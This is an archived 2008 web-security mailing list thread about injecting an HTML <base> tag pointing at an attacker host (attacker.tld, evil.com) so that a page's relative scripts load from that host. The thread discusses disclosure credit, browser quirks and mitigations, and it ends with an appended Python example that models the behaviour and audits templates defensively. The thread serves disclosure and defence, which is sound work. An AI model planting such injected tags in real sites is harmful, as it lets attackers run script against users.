Re: [WEB SECURITY] Nice little XSS trick
- From: "James Landis" <jcl24@xxxxxxxxxxx>
- Subject: Re: [WEB SECURITY] Nice little XSS trick
- Date: Thu, 17 Jul 2008 08:34:10 -0700
No offense taken! I wasn't blaming Joe Web Dev for not following the
spec, I was blaming browser vendors. Quirks-mode rendering is what has
gotten us into the situation where Web developers don't have to learn
the spec in the first place. As long as their HTML is close enough, it
renders.
I understand the market pressures that led us down this path. Remember
how quickly we all dumped NS4 when it didn't even show a page at all
if the HTML was broken? Hindsight is 20/20, but to me writing a
permissive parser sounds a hell of a lot harder than just throwing an
error when something breaks spec. Imagine where we would be today if
vendors had gone this route instead of quirks mode.
You said it was almost impossible for browser vendors to address this
problem. Maybe that's true from a market perspective, but not from a
technical one (unless the attacker can inject into the HEAD). That's
the only point I was trying to make about following the spec.
-j
On Thu, Jul 17, 2008 at 7:08 AM, Arshan Dabirsiaghi
<arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx> wrote:
> No offense at all intended, but blaming developers for not following the
> spec is easy but in the end just not very useful. When the most common
> usage deviates from the spec, looking back at the past doesn't help
> much. Incidentally, expecting your everyday Joe Coder to code to spec
> when he receives no formal education of the spec is a very bizarre
> phenomenon IMHO.
>
> Microsoft's improvement of IE7's base-related behavior will trickle down
> though, (un)fortunately. Since IE7 won't process a <base> outside of
> <head>, developers will be forced to alter their sites so that their IE7
> users won't have a broken site. So for sites of any worth, this will now
> be a very corner case exploit.
>
> I even tried wrapping the <base> exploit inside an injected <head> and
> some other things to see if I could trick it into processing it, but
> alas, nothing. Maybe Gareth should fuzz it - these browsers are too
> liberal and I would be surprised if it was 100% bulletproof in this
> respect.
>
> Arshan
>
> -----Original Message-----
> From: elspood@xxxxxxxxx [mailto:elspood@xxxxxxxxx] On Behalf Of James
> Landis
> Sent: Wednesday, July 16, 2008 4:36 PM
> To: Arshan Dabirsiaghi
> Cc: David Byrne; Amit Klein; websecurity@xxxxxxxxxxxxx
> Subject: Re: [WEB SECURITY] Nice little XSS trick
>
> It's almost impossible if the attacker can inject a BASE tag into the
> HEAD.
>
> It's easy if they, oh I dunno, FOLLOW THE SPEC.
>
> -j
>
> On Wed, Jul 16, 2008 at 12:32 PM, Arshan Dabirsiaghi
> <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx> wrote:
>> Yeah, and a typical, unfortunate reaction from sirdarkcat (not typical
>> of him, just of the security community in general). It's different
>> because it'd be trivially easy for the browser vendors to prevent the
>> javascript: technique, but almost impossible to fix this variant.
>>
>> Arshan
>>
>> -----Original Message-----
>> From: David Byrne [mailto:davidribyrne@xxxxxxxxx]
>> Sent: Wednesday, July 16, 2008 3:30 PM
>> To: Arshan Dabirsiaghi; Amit Klein
>> Cc: websecurity@xxxxxxxxxxxxx
>> Subject: Re: [WEB SECURITY] Nice little XSS trick
>>
>> I need to indulge my vanity :) I posted something similar almost a year
>> ago. Granted, I didn't take the time to write it up nicely.
>>
>> http://sla.ckers.org/forum/read.php?2,14751
>>
>> ----- Original Message ----
>> From: Arshan Dabirsiaghi <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx>
>> To: Amit Klein <aksecurity@xxxxxxxxx>
>> Cc: websecurity@xxxxxxxxxxxxx
>> Sent: Wednesday, July 16, 2008 8:45:28 AM
>> Subject: RE: [WEB SECURITY] Nice little XSS trick
>>
>> You're too nice - no need to apologize or defer credit. You discovered
>> it on your own. If you can't find it in Google, CWE or the OWASP Testing
>> Guide, I frankly don't think you can call it public knowledge, and
>> therefore it should be publicly discussed.
>>
>> Arshan
>>
>> -----Original Message-----
>> From: Amit Klein [mailto:aksecurity@xxxxxxxxx]
>> Sent: Wednesday, July 16, 2008 10:34 AM
>> To: Arshan Dabirsiaghi
>> Cc: websecurity@xxxxxxxxxxxxx
>> Subject: Re: [WEB SECURITY] Nice little XSS trick
>>
>> Hi Arshan+list,
>>
>> Indeed - the same vulnerability. I did google for it, but I didn't
>> pick up your site (and RSnake's cheat sheet doesn't list it - now I
>> know why).
>>
>> Anyway - sorry. You deserve full credit for it, of course.
>>
>> Thanks for the correction and the further information,
>> -Amit
>>
>>
>> On 7/16/08, Arshan Dabirsiaghi <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx>
>> wrote:
>>>
>>> http://i8jesus.com/?p=10 (Jan 2008)
>>>
>>> I also presented this vector last year at OWASP San Jose when I demo'ed
>>> AntiSamy as an example of dangerous content that isn't malicious code on its
>>> own. That's one of the selling points of AntiSamy - it stops not only XSS
>>> (well, we hope) but also prevents phishing attacks that abuse HTML/CSS.
>>>
>>> I talked about it with RSnake afterwards and he had some crazy reason for
>>> not putting it on his cheatsheet - claimed it was too much like the <base
>>> href="javascript:foo();//"> vector. As noted on my blog post, IE7 is no longer
>>> (according to policy) supposed to be honoring <base> tags outside of <HEAD>,
>>> but FF is still vulnerable. You could use this to hijack anything -
>>> stylesheets (more XSS/phishing), images, scripts, etc. The only thing <base>
>>> won't help you steal as far as resources is anything gathered in JavaScript.
>>>
>>> I think some of the big players had this figured out already (or more
>>> likely, just got really lucky). MySpace takes <base href> values, base64
>>> encodes them, and redirects them through another domain. The flow is like
>>> this for them:
>>>
>>> 1. User puts in <base href="http://evil.com">
>>> 2. Str = base64("http://evil.com")
>>> 3. Profile = <base href="http://msplinks.com/redir?<base64encodedStr>
>>>
>>> Maybe there's a way to abuse that, but I don't think so. And eBay doesn't
>>> have any relative links after user content, at least when I first looked at
>>> this last year. They probably both just got lucky. =]
>>>
>>> Arshan
>>>
>>> ---------- Previous message ----------
>>> From: Amit Klein <aksecurity@xxxxxxxxx>
>>> Date: Tue, Jul 15, 2008 at 7:33 AM
>>> Subject: [WEB SECURITY] Nice little XSS trick
>>> To: Web Security <websecurity@xxxxxxxxxxxxx>
>>>
>>> Hi list
>>>
>>> Recently I've been thinking about bypassing anti-XSS filters, and a nice
>>> little trick occurred to me, which I haven't seen anywhere (e.g. it's not on
>>> RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does mention
>>> BASE, but not the trick I describe here). The idea is to use the HTML BASE
>>> tag to force loading of JS code from the attacker's host. Consider a page
>>> with an XSS vulnerability such as:
>>>
>>> <html>
>>> ...
>>> ***XSS code may be embedded here***
>>> ...
>>> <script src="/foo/bar.js"></script>
>>> ...
>>> </html>
>>>
>>> Now, an attacker can inject <base href="http://www.attacker.tld/">, and next
>>> thing you know, the browser (IE, at least) loads the JS from
>>> http://www.attacker.tld/foo/bar.js... And the beauty is that there's no
>>> "explicit" JS code involved in the payload itself.
>>>
>>> Note that according to the HTML standard, BASE should be placed in the HEAD
>>> section (http://www.w3.org/TR/html401/struct/links.html#edef-BASE).
>>> This is indeed observed by FF 2, but not by IE (checked IE6).
>>>
>>> Thanks,
>>> -Amit
----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec
Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/
Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA
Brought to you by http://www.webappsec.org
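Added example, not part of this thread or any poster's code: a small Python model of the behaviour the thread argues over. It resolves a page's relative `<script src>` under two parser models (a permissive one that honours a `<base>` anywhere, as the thread reports for IE6, and a spec-following one that honours it only inside `<head>`, as reported for FF 2), then shows the two defensive checks the thread mentions: auditing a template for relative resource URLs after user content (the eBay observation) and refusing `<base>` in user fragments via a tag allow-list (the AntiSamy approach). The page URL, the template, the `.example` hostnames and the allow-list are constructed assumptions for the demo.

```python
"""Added example (not from the thread): how an injected <base> shifts the
resolution of a later relative <script src>, plus two defender-side checks."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed values: the page under attack and the fragment from the thread,
# using the reserved .example TLD in place of attacker.tld.
PAGE_URL = "https://www.example.com/profile/123"
INJECTED_BASE = '<base href="http://www.attacker.example/">'


def build_page(user_content):
    """Constructed template: user-controlled HTML lands before a relative script."""
    return (
        "<html><head><title>Profile</title></head><body>"
        '<div class="user">' + user_content + "</div>"
        '<script src="/foo/bar.js"></script>'
        "</body></html>"
    )


class ScriptResolver(HTMLParser):
    """Resolve each <script src> as a browser would under one of two models.
    honor_base_anywhere=True: any <base href> counts (the IE6 behaviour reported
    in the thread). False: only a <base> inside <head>, before <body>, counts
    (the spec / FF 2 behaviour). Real tree builders are more involved; this is
    a teaching model, not a browser."""

    def __init__(self, page_url, honor_base_anywhere):
        super().__init__()
        self.base = page_url
        self.honor_base_anywhere = honor_base_anywhere
        self.in_head = False
        self.body_started = False
        self.base_seen = False
        self.raw_srcs = []
        self.resolved = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "head":
            self.in_head = True
        elif tag == "body":
            self.body_started = True
        elif tag == "base" and attrs.get("href") and not self.base_seen:
            # Only the first <base href> counts; whether a late one in the body
            # is honoured is the whole difference between the two models.
            spec_position = self.in_head and not self.body_started
            if spec_position or self.honor_base_anywhere:
                self.base = urljoin(self.base, attrs["href"])
                self.base_seen = True
        elif tag == "script" and attrs.get("src"):
            self.raw_srcs.append(attrs["src"])
            self.resolved.append(urljoin(self.base, attrs["src"]))

    def handle_endtag(self, tag):
        if tag == "head":
            self.in_head = False


def resolve_scripts(html, honor_base_anywhere):
    """Absolute URLs a browser under the given model would fetch."""
    p = ScriptResolver(PAGE_URL, honor_base_anywhere)
    p.feed(html)
    p.close()
    return p.resolved


def relative_script_srcs(html):
    """Template audit (the eBay-style mitigation): script URLs with no
    scheme/host, i.e. the ones that would follow an injected <base>."""
    p = ScriptResolver(PAGE_URL, honor_base_anywhere=False)
    p.feed(html)
    p.close()
    return [s for s in p.raw_srcs if not urlsplit(s).netloc]


# Constructed allow-list for user-supplied fragments; <base> is simply not on it.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li", "a", "img"}


class TagAudit(HTMLParser):
    def __init__(self):
        super().__init__()
        self.disallowed = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.disallowed.append(tag)


def disallowed_tags(fragment):
    """Tags in a user fragment an allow-list sanitizer would reject;
    a non-empty result means the fragment must be cleaned or refused."""
    a = TagAudit()
    a.feed(fragment)
    a.close()
    return a.disallowed


if __name__ == "__main__":
    page = build_page(INJECTED_BASE)
    print("permissive model:", resolve_scripts(page, True))
    print("head-only model: ", resolve_scripts(page, False))
    print("relative srcs:   ", relative_script_srcs(page))
    print("disallowed tags: ", disallowed_tags(INJECTED_BASE))
```

The two audits are the actionable part: `relative_script_srcs` tells a template owner whether a `<base>` landing anywhere in user content could redirect a script fetch at all, and `disallowed_tags` shows why an allow-list sanitizer needs no special case for this trick, since `base` never makes the list.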